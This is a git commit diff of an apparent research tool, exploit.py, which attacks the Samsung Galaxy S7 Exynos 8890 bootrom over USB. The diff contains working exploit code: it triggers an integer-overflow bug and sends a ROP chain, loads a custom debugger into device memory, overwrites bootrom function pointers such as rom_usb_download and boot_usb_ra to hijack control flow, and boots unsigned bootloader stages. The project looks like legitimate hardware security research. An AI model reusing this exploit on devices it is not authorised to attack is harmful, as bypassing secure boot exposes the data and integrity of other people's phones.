Now booting into USB recovery. Not yet jumping back to the debugger at each boot stage

This commit is contained in:
Jonathan Herrewijnen 2024-08-16 18:15:53 +02:00
parent dc64defded
commit 55da2ce981
2 changed files with 151 additions and 126 deletions

View File

@ -28,7 +28,16 @@
"program": "exploit.py", "program": "exploit.py",
"console": "integratedTerminal", "console": "integratedTerminal",
"justMyCode": false, "justMyCode": false,
"args": ["--boot"] "args": ["--unsecure-boot"]
},
{
"name": "Run debugger boot",
"type": "debugpy",
"request": "launch",
"program": "exploit.py",
"console": "integratedTerminal",
"justMyCode": false,
"args": ["--debugger-boot"],
}, },
{ {
"name": "Debug current file", "name": "Debug current file",

View File

@ -86,7 +86,7 @@ class ExynosDevice():
sys.exit(0) sys.exit(0)
else: else:
raise e raise e
# claim usb interface # claim usb interface
self.handle.claimInterface(0) self.handle.claimInterface(0)
print(f"Connected device! {hex(self.idVendor)} {hex(self.idProduct)}") print(f"Connected device! {hex(self.idVendor)} {hex(self.idProduct)}")
@ -98,12 +98,14 @@ class ExynosDevice():
self.context.exit() self.context.exit()
def write(self, data): def write(self, data):
"""Write data to the device"""
transferred = ctypes.c_int() transferred = ctypes.c_int()
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, data, len(data), ctypes.byref(transferred), 0) res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, data, len(data), ctypes.byref(transferred), 0)
assert(res == 0), "Could not perform bulk transfer" assert(res == 0), "Could not perform bulk transfer"
return res return res
def send_empty_transfer(self): def send_empty_transfer(self):
"""Send an empty transfer (to not actually write data)"""
transferred = ctypes.c_int() transferred = ctypes.c_int()
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, 0, 0, ctypes.byref(transferred), 0) res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, 0, 0, ctypes.byref(transferred), 0)
assert(res == 0) assert(res == 0)
@ -127,6 +129,7 @@ class ExynosDevice():
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 10) res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 10)
def test_bug(self): def test_bug(self):
"""Verify bug existence"""
# Start by sending a valid packet # Start by sending a valid packet
# Integer overflow in the size field # Integer overflow in the size field
# unk + size + payload + header # unk + size + payload + header
@ -147,39 +150,45 @@ class ExynosDevice():
TODO not working TODO not working
''' '''
# construct dl_data # construct dl_data
dpayload = struct.pack("<II", 0, len(payload) + 8 + 2) dpayload = struct.pack("<II", 0, (len(payload) + 8 + 2))
dpayload = dpayload + payload + b"\x00" * 2 # add footer dpayload = dpayload + payload + b"\x00" * 2 # add footer
transferred = ctypes.c_int() transferred = ctypes.c_int()
for block in range(0, len(dpayload), BLOCK_SIZE): for block in range(0, len(dpayload), BLOCK_SIZE):
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, dpayload[block:block + BLOCK_SIZE], len(dpayload[block:block + BLOCK_SIZE]), ctypes.byref(transferred), 0) res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, dpayload[block:block + BLOCK_SIZE], len(dpayload[block:block + BLOCK_SIZE]), ctypes.byref(transferred), 0)
assert res == 0, "Error sending payload" assert res == 0, "Error sending payload"
p_ok("Sended stage") p_ok("Sent stage")
def unsecure_boot(self):
self.exploit(open("../../dump/exynos-usbdl/payloads/Exynos8890_unsecure_boot_usb.bin", "rb").read()) def unsecure_boot(self, exploit=False):
time.sleep(2) '''
self.connect_device() Do a normal boot process, with or without exploit.
'''
if exploit:
self.exploit(open("../../dump/exynos-usbdl/payloads/Exynos8890_unsecure_boot_usb.bin", "rb").read())
time.sleep(2)
self.connect_device()
# self.send_normal_stage("/home/eljakim/Source/Samsung_S7/source/S7/g930f_latest/g930f_sboot.bin.1.bin") # self.send_normal_stage("/home/eljakim/Source/Samsung_S7/source/S7/g930f_latest/g930f_sboot.bin.1.bin")
self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.1.bin", "rb").read()) self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.1.bin", "rb").read())
# self.send_normal_stage(open("../S7/bl1.bin", "rb").read())
# self.send_normal_stage(open("../../dump/rom.bin.1.bin", "rb").read())
# wait_disconnect() # wait_disconnect()
time.sleep(2) time.sleep(2)
self.connect_device() self.connect_device()
self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.2.bin", "rb").read()) self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.2.bin", "rb").read())
# self.send_normal_stage(open("../S7/bl31.bin", "rb").read())
# wait_disconnect() # wait_disconnect()
time.sleep(2) time.sleep(2)
self.connect_device() self.connect_device()
self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read()) self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read())
# self.send_normal_stage(open("../S7/sboot.bin.3.bin", "rb").read())
# wait_disconnect() # wait_disconnect()
time.sleep(2) time.sleep(2)
self.connect_device() self.connect_device()
self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.4.bin", "rb").read()) self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.4.bin", "rb").read())
# self.send_normal_stage(open("../S7/sboot.bin.4.bin", "rb").read())
# self.send_normal_stage(open("../S7/bl1.bin", "rb").read())
# self.send_normal_stage(open("../S7/bl31.bin", "rb").read())
# self.send_normal_stage(open("../S7/sboot.bin.3.bin", "rb").read())
# self.send_normal_stage(open("../S7/sboot.bin.4.bin", "rb").read())
pass pass
def exploit(self, payload: bytes): def exploit(self, payload: bytes):
''' '''
Exploit the Exynos device, payload of 502 bytes max. This will send stage1 payload. Exploit the Exynos device, payload of 502 bytes max. This will send stage1 payload.
@ -234,7 +243,9 @@ class ExynosDevice():
transferred = ctypes.c_int(0) transferred = ctypes.c_int(0)
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, rop_chain, len(rop_chain), ctypes.byref(transferred), 0) res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, rop_chain, len(rop_chain), ctypes.byref(transferred), 0)
assert res == 0, "Error sending ROP chain" assert res == 0, "Error sending ROP chain"
return
def usb_write(self, data): def usb_write(self, data):
assert len(data) <= 0x200, "Data too big" assert len(data) <= 0x200, "Data too big"
transferred = ctypes.c_int() transferred = ctypes.c_int()
@ -243,13 +254,15 @@ class ExynosDevice():
assert transferred.value == len(data), f"Invalid transfered size {transferred.value} != {len(data)}" assert transferred.value == len(data), f"Invalid transfered size {transferred.value} != {len(data)}"
return transferred.value return transferred.value
def usb_read(self, size): def usb_read(self, size):
transferred = ctypes.c_int() transferred = ctypes.c_int()
buf = ctypes.c_buffer(b"", size) buf = ctypes.c_buffer(b"", size)
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_IN, buf, len(buf), ctypes.byref(transferred), 300) res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_IN, buf, len(buf), ctypes.byref(transferred), 300)
assert res == 0, f"Error receiving data {res}" assert res == 0, f"Error receiving data {res}"
return buf.raw[:transferred.value] return buf.raw[:transferred.value]
def setup_concrete_device(self, concrete_device : ConcreteDevice): def setup_concrete_device(self, concrete_device : ConcreteDevice):
#Setup architecture #Setup architecture
concrete_device.arch = QL_ARCH.ARM64 concrete_device.arch = QL_ARCH.ARM64
@ -265,6 +278,7 @@ class ExynosDevice():
#Overwrite all calls to make the concrete target function properly #Overwrite all calls to make the concrete target function properly
concrete_device.copy_functions() concrete_device.copy_functions()
def usb_debug(self): def usb_debug(self):
""" """
Function to debug USB behaviour. Sends and receives data in continuous flow. Function to debug USB behaviour. Sends and receives data in continuous flow.
@ -291,6 +305,7 @@ class ExynosDevice():
_recv_data() _recv_data()
count += 1 count += 1
def dump_memory(self, start: hex=0x0, end: hex=0x0206ffff, write=False): def dump_memory(self, start: hex=0x0, end: hex=0x0206ffff, write=False):
""" """
Dumps memory from the device. Dumps memory from the device.
@ -312,11 +327,6 @@ class ExynosDevice():
f.write(dumped) f.write(dumped)
return dumped return dumped
# transferred = ctypes.c_int()
# stack_pointer = 0x02021810
# for block in range(0x2020000, 0x2200000, 0x200):
# stack_pointer += 0x200
# dumped += self.cd.memdump_region(block, 0x200)
def setup_guppy_debugger(self): def setup_guppy_debugger(self):
""" """
@ -356,32 +366,34 @@ class ExynosDevice():
_initial_run_debugger() _initial_run_debugger()
_setup_debugger() _setup_debugger()
def relocate_debugger(self):
# Seems to be cleared upon cache clearing??
if os.getenv("USER") == "eljakim":
debugger_reloc = open("/home/eljakim/Source/gupje/source/bin/samsung_s7/reloc_debugger.bin", "rb").read()
else:
try:
debugger_reloc = open("../../dump/reloc_debugger.bin", "rb").read()
except Exception as e:
print(f'Are you missing your debugger? Please ensure it is present in dump/debugger.bin. {e}')
sys.exit(0)
self.cd.memwrite_region(0x020c0000, debugger_reloc)
self.usb_write(b"FLSH") # Flush cache
self.cd.restore_stack_and_jump(0x020c0000)
assert self.usb_read(0x200) == b"GiAs", "Failed to relocate debugger"
self.cd.relocate_debugger(0x020c7000, 0x020c0000, 0x020c4000)
def dumb_interact(self, dump_imems=False): def dumb_interact(self, dump_imems=False):
''' '''
Room for playing around with the debugger Room for playing around with the debugger on the phone.
''' '''
self.cd.arch_dbg.state.auto_sync = False self.cd.arch_dbg.state.auto_sync = False
self.cd.arch_dbg.state.auto_sync_special = False self.cd.arch_dbg.state.auto_sync_special = False
logger.debug('State after setting up initial debugger') logger.debug('State after setting up initial debugger')
self.cd.arch_dbg.state.print_ctx() self.cd.arch_dbg.state.print_ctx()
def relocate_debugger():
# Seems to be cleared upon cache clearing??
if os.getenv("USER") == "eljakim":
debugger_reloc = open("/home/eljakim/Source/gupje/source/bin/samsung_s7/reloc_debugger.bin", "rb").read()
else:
try:
debugger_reloc = open("../../dump/reloc_debugger.bin", "rb").read()
except Exception as e:
print(f'Are you missing your debugger? Please ensure it is present in dump/debugger.bin. {e}')
sys.exit(0)
self.cd.memwrite_region(0x020c0000, debugger_reloc)
self.usb_write(b"FLSH") # Flush cache
self.cd.restore_stack_and_jump(0x020c0000)
assert self.usb_read(0x200) == b"GiAs", "Failed to relocate debugger"
self.cd.relocate_debugger(0x020c7000, 0x020c0000, 0x020c4000)
def first_debugger(): def first_debugger():
debugger = open("/home/eljakim/Source/gupje/source/bin/samsung_s7/debugger.bin", "rb").read() debugger = open("/home/eljakim/Source/gupje/source/bin/samsung_s7/debugger.bin", "rb").read()
@ -390,20 +402,24 @@ class ExynosDevice():
assert self.usb_read(0x200) == b"GiAs", "Failed to relocate debugger" assert self.usb_read(0x200) == b"GiAs", "Failed to relocate debugger"
self.cd.relocate_debugger(0x206d000 + 0x1000, 0x2069000, 0x206d000) self.cd.relocate_debugger(0x206d000 + 0x1000, 0x2069000, 0x206d000)
# relocate_debugger() # self.relocate_debugger()
DEBUGGER_ADDR = 0x2069000 #0x020c0000 DEBUGGER_ADDR = 0x2069000 #0x020c0000
### Get whereabouts of the debugger and current processor state
logger.debug('State after relocating debugger') logger.debug('State after relocating debugger')
self.cd.arch_dbg.state.print_ctx() self.cd.arch_dbg.state.print_ctx()
def memdump_imem(): def memdump_imem():
"""
Dumps the internal memory of the device (0x2020000 - 0x2070000).
"""
dumped = b"" dumped = b""
for block in range(0x2020000, 0x2070000, 0x200): for block in range(0x2020000, 0x2070000, 0x200):
# print(hex(block)) # print(hex(block))
dumped += self.cd.memdump_region(block, 0x200) dumped += self.cd.memdump_region(block, 0x200)
return dumped return dumped
AUTH_BL1 = 0x00012848 AUTH_BL1 = 0x00012848 # Location of the authentication function
def auth_bl1(lr=0x2069000): def auth_bl1(lr=0x2069000):
# Load the firmware # Load the firmware
self.cd.arch_dbg.state.X0 = 1 self.cd.arch_dbg.state.X0 = 1
@ -413,18 +429,17 @@ class ExynosDevice():
assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger" assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"
assert self.cd.arch_dbg.state.X0 == 0, "auth_bl1 returned with error!" assert self.cd.arch_dbg.state.X0 == 0, "auth_bl1 returned with error!"
BOOT_BL1 = 0x00019310 BOOT_BL1 = 0x00019310 # Location of the boot function
def boot_bl1(lr=0x2069000): def boot_bl1(lr=0x2069000):
self.cd.arch_dbg.state.LR = lr self.cd.arch_dbg.state.LR = lr
self.cd.restore_stack_and_jump(BOOT_BL1) self.cd.restore_stack_and_jump(BOOT_BL1)
assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger" assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"
JUMP_BL1 = 0x000002c0 JUMP_BL1 = 0x000002c0 # Location of the function to start the BL1 boot
def jump_bl1(lr): def jump_bl1(lr):
self.cd.arch_dbg.state.LR = lr self.cd.arch_dbg.state.LR = lr
self.cd.restore_stack_and_jump(JUMP_BL1) self.cd.restore_stack_and_jump(JUMP_BL1)
# Always hijack rom_usb_download function: # Always hijack rom_usb_download function:
rom_usb_download = self.cd.memdump_region(0x020200dc, 4) rom_usb_download = self.cd.memdump_region(0x020200dc, 4)
self.cd.memwrite_region(0x020200dc, p32(0x2069000)) self.cd.memwrite_region(0x020200dc, p32(0x2069000))
@ -432,7 +447,7 @@ class ExynosDevice():
# Try loading bl1 # Try loading bl1
bl1 = open("../S7/bl1.bin", "rb").read() bl1 = open("../S7/bl1.bin", "rb").read()
self.cd.memwrite_region(0x02021800, bl1) self.cd.memwrite_region(0x02021800, bl1)
self.usb_write(b"FLSH") # Flush cache self.usb_write(b"FLSH") # Flush cache, as Frederic does
self.cd.test_connection() self.cd.test_connection()
auth_bl1(DEBUGGER_ADDR) auth_bl1(DEBUGGER_ADDR)
# boot_bl1(DEBUGGER_ADDR) # boot_bl1(DEBUGGER_ADDR)
@ -462,39 +477,15 @@ class ExynosDevice():
# self.cd.memwrite_region(0x02022a08, self.cd.arch_dbg.sc.mov_0_w0_ins + self.cd.arch_dbg.sc.ret_ins) # Overwrite line register to jump back to debugger (see code flow at 0x02021800 +0x10, after the bl1 has been written to memory at this address) # self.cd.memwrite_region(0x02022a08, self.cd.arch_dbg.sc.mov_0_w0_ins + self.cd.arch_dbg.sc.ret_ins) # Overwrite line register to jump back to debugger (see code flow at 0x02021800 +0x10, after the bl1 has been written to memory at this address)
# self.cd.memwrite_region(0x2022948 + 4, self.cd.arch_dbg.sc.branch_absolute(DEBUGGER_ADDR)) # self.cd.memwrite_region(0x2022948 + 4, self.cd.arch_dbg.sc.branch_absolute(DEBUGGER_ADDR))
# Patch stupid error funciton # Patch stupid error function
# self.usb_write(b"FLSH") # Flush cache # self.usb_write(b"FLSH") # Flush cache
# Download next stage? # Download next stage?
lr = self.cd.arch_dbg.state.LR lr = self.cd.arch_dbg.state.LR
# self.cd.arch_dbg.state.LR = DEBUGGER_ADDR # self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
pass pass
# Using keystone, look for each msr instruction (AARCH64, LE)
# If wanting to modify the binary
# bl1 = bl1[:0x1C23] + b'\xaa' + bl1[0x1C24:]
imem1 = memdump_imem()
auth_bl1(0x020c0000)
# Dump memory
# imem2 = memdump_imem()
# with open("/tmp/imem1_bad.bin", "wb") as f:
# f.write(imem1)
# with open("/tmp/imem2_bad.bin", "wb") as f:
# f.write(imem2)
# Overwrite jump back to the debugger from functions encountered during jump_bl1 # Overwrite jump back to the debugger from functions encountered during jump_bl1
# self.cd.memwrite_region(0x02020108, p32(0x020c0000)) # Hijack some weird function, original 0x00005790
self.cd.memwrite_region(0x020200e8, p32(0x020c0000)) # Overwrite line register to jump back to debugger (see code flow at 0x02021800 +0x10, after the bl1 has been written to memory at this address) self.cd.memwrite_region(0x020200e8, p32(0x020c0000)) # Overwrite line register to jump back to debugger (see code flow at 0x02021800 +0x10, after the bl1 has been written to memory at this address)
self.cd.memwrite_region(0x020200dc, p32(0x020c0000)) self.cd.memwrite_region(0x020200dc, p32(0x020c0000))
@ -502,8 +493,6 @@ class ExynosDevice():
print(f"From = {hex(self.cd.arch_dbg.state.LR - 4)} X0 = {hex(self.cd.arch_dbg.state.X0)}") print(f"From = {hex(self.cd.arch_dbg.state.LR - 4)} X0 = {hex(self.cd.arch_dbg.state.X0)}")
self.cd.restore_stack_and_jump(0x00000314) self.cd.restore_stack_and_jump(0x00000314)
jump_bl1(0x020c0000) jump_bl1(0x020c0000)
def handle_weird_brom(): def handle_weird_brom():
while True: while True:
@ -517,20 +506,13 @@ class ExynosDevice():
pass pass
handle_weird_brom() handle_weird_brom()
# Parse pagetables ### For getting special registers. Non-writeable registers are detected. (UXN, PXN, etc)
# self.cd.jump_to(0x2069000) # self.cd.jump_to(0x2069000)
# assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger" # assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"
# self.cd.fetch_special_regs() # self.cd.fetch_special_regs()
# Address to download to
self.cd.memwrite_region(0x02022a08, self.cd.arch_dbg.sc.mov_0_w0_ins + self.cd.arch_dbg.sc.ret_ins) self.cd.memwrite_region(0x02022a08, self.cd.arch_dbg.sc.mov_0_w0_ins + self.cd.arch_dbg.sc.ret_ins)
# testfun(0x2069000)
self.cd.arch_dbg.state.X0 = 1 self.cd.arch_dbg.state.X0 = 1
self.cd.restore_stack_and_jump(self.cd.arch_dbg.state.LR) self.cd.restore_stack_and_jump(self.cd.arch_dbg.state.LR)
self.usb_read(0x200) # GiAs self.usb_read(0x200) # GiAs
@ -538,7 +520,8 @@ class ExynosDevice():
self.cd.arch_dbg.state.LR = 0x2069000 self.cd.arch_dbg.state.LR = 0x2069000
self.cd.restore_stack_and_jump(0x00000314) self.cd.restore_stack_and_jump(0x00000314)
pass pass
### UXN and PXN seem to be present over the USB stack (02021800+)
shellcode = f""" shellcode = f"""
ldr x0, debugger_addr ldr x0, debugger_addr
blr x0 blr x0
@ -551,11 +534,7 @@ class ExynosDevice():
self.cd.jump_to(0x2021800) self.cd.jump_to(0x2021800)
pass pass
# load bl31
# bl31 = bl31[:0x14] + self.cd.arch_dbg.sc.branch_absolute(0x2069000) + bl31[0x24:] # Overwrite jump back to debugger # bl31 = bl31[:0x14] + self.cd.arch_dbg.sc.branch_absolute(0x2069000) + bl31[0x24:] # Overwrite jump back to debugger
# # Write bl31 at 0x02021800 and authenticate # # Write bl31 at 0x02021800 and authenticate
auth_bl1(0x020c0000) auth_bl1(0x020c0000)
@ -564,23 +543,7 @@ class ExynosDevice():
jump_bl1(0x02021800) jump_bl1(0x02021800)
pass pass
# OLD # VERY OLD
def memdump_try():
self.cd.arch_dbg.state.LR = 0x020200e8
self.cd.restore_stack_and_jump(0x02021810)
stack_pointer = 0x02021810
dumped = b""
for block in range(0x2020000, 0x2200000, 0x200):
stack_pointer += 0x200
self.cd.arch_dbg.state.print_ctx()
print(hex(block))
dumped += self.cd.memdump_region(block, 0x200)
# self.cd.restore_stack_and_jump(0x02021810)
#000125b4 #000125b4
# self.cd.arch_dbg.state.LR = 0x2069000 #jump back to debugger when finished # self.cd.arch_dbg.state.LR = 0x2069000 #jump back to debugger when finished
@ -588,36 +551,85 @@ class ExynosDevice():
# self.cd.restore_stack_and_jump(0x000125b4) # self.cd.restore_stack_and_jump(0x000125b4)
def debugger_boot(self):
auth_bl1() """
Boot into USB recovery mode using the debugger.
# auth_bl1() """
jump_bl1() ### Setup debugger
assert self.usb_read(0x200) == b"GiAs", "not jumped back to debugger?" self.setup_guppy_debugger()
self.cd.arch_dbg.state.print_ctx()
def jump_bl31():
self.cd.arch_dbg.state.LR = 0x2069000
self.cd.restore_stack_and_jump(0x02021810)
bl31 = open("../S7/bl31.bin", "rb").read()
self.cd.memwrite_region(0x02021800, bl31) self.cd.arch_dbg.state.auto_sync = False
jump_bl31() self.cd.arch_dbg.state.auto_sync_special = False
assert self.usb_read(0x200) == b"GiAs", "not jumped back to debugger?" logger.debug('State after setting up initial debugger')
self.cd.arch_dbg.state.print_ctx() self.cd.arch_dbg.state.print_ctx()
DEBUGGER_ADDR = 0x2069000 #0x020c0000
### Overwrite boot_usb_ra to our debugger
self.cd.test_connection()
hijacked_usb_ra = self.cd.memdump_region(0x02020f60, 8)
self.cd.memwrite_region(0x02020f60, p64(0x2069000))
### Set link register and boot into the USB function
BOOT_USB_FUNCTION = 0x000064e0
self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
self.cd.restore_stack_and_jump(BOOT_USB_FUNCTION)
time.sleep(1)
self.connect_device()
# Setup jump and authentication
AUTH_BL1 = 0x00012848
def auth_bl1(lr=0x2069000):
# Load the firmware
self.cd.arch_dbg.state.X0 = 1
self.cd.arch_dbg.state.X1 = 1
self.cd.arch_dbg.state.LR = lr #jump back to debugger when finished
self.cd.restore_stack_and_jump(AUTH_BL1)
assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"
### Check if authentication was successful - X0 should not be 0??
# assert self.cd.arch_dbg.state.X0 == 0, "auth_bl1 returned with error!"
JUMP_BL1 = 0x000002c0
def jump_bl1(lr):
self.cd.arch_dbg.state.LR = lr
self.cd.restore_stack_and_jump(JUMP_BL1)
# Send boot stage 1
self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.1.bin", "rb").read())
# self.send_normal_stage(open("../S7/bl1.bin", "rb").read())
# memdump_try() assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"
# auth_bl1() auth_bl1(DEBUGGER_ADDR)
self.cd.arch_dbg.state.print_ctx() time.sleep(1)
#authenticate it self.cd.memwrite_region(0x02020f60, hijacked_usb_ra)
self.usb_write(b"FLSH") # Flush cache
jump_bl1(DEBUGGER_ADDR)
time.sleep(2)
self.connect_device()
# self.connect_device()
self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.2.bin", "rb").read())
time.sleep(2)
self.connect_device()
self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read())
time.sleep(2)
self.connect_device()
self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.4.bin", "rb").read())
time.sleep(2)
self.connect_device()
pass pass
if __name__ == "__main__": if __name__ == "__main__":
arg = argparse.ArgumentParser("Exynos exploit") arg = argparse.ArgumentParser("Exynos exploit")
arg.add_argument("--debug", action="store_true", help="Debug USB stack", default=False) arg.add_argument("--debug", action="store_true", help="Debug USB stack", default=False)
arg.add_argument("--boot", action="store_true", help="Unsecure boot", default=False) arg.add_argument("--unsecure-boot", action="store_true", help="Unsecure boot", default=False)
arg.add_argument("--debugger-boot", action="store_true", help="Unsecure boot", default=False)
args = arg.parse_args() args = arg.parse_args()
exynos = ExynosDevice() exynos = ExynosDevice()
@ -629,13 +641,17 @@ if __name__ == "__main__":
# exynos.usb_debug() # exynos.usb_debug()
sys.exit(0) sys.exit(0)
if args.boot: if args.unsecure_boot:
exynos.unsecure_boot() exynos.unsecure_boot()
sys.exit(0) sys.exit(0)
stage1 = open("stage1/stage1.bin", "rb").read() stage1 = open("stage1/stage1.bin", "rb").read()
exynos.exploit(stage1) exynos.exploit(stage1)
if args.debugger_boot:
exynos.debugger_boot()
sys.exit(0)
exynos.setup_guppy_debugger() exynos.setup_guppy_debugger()
exynos.dumb_interact() exynos.dumb_interact()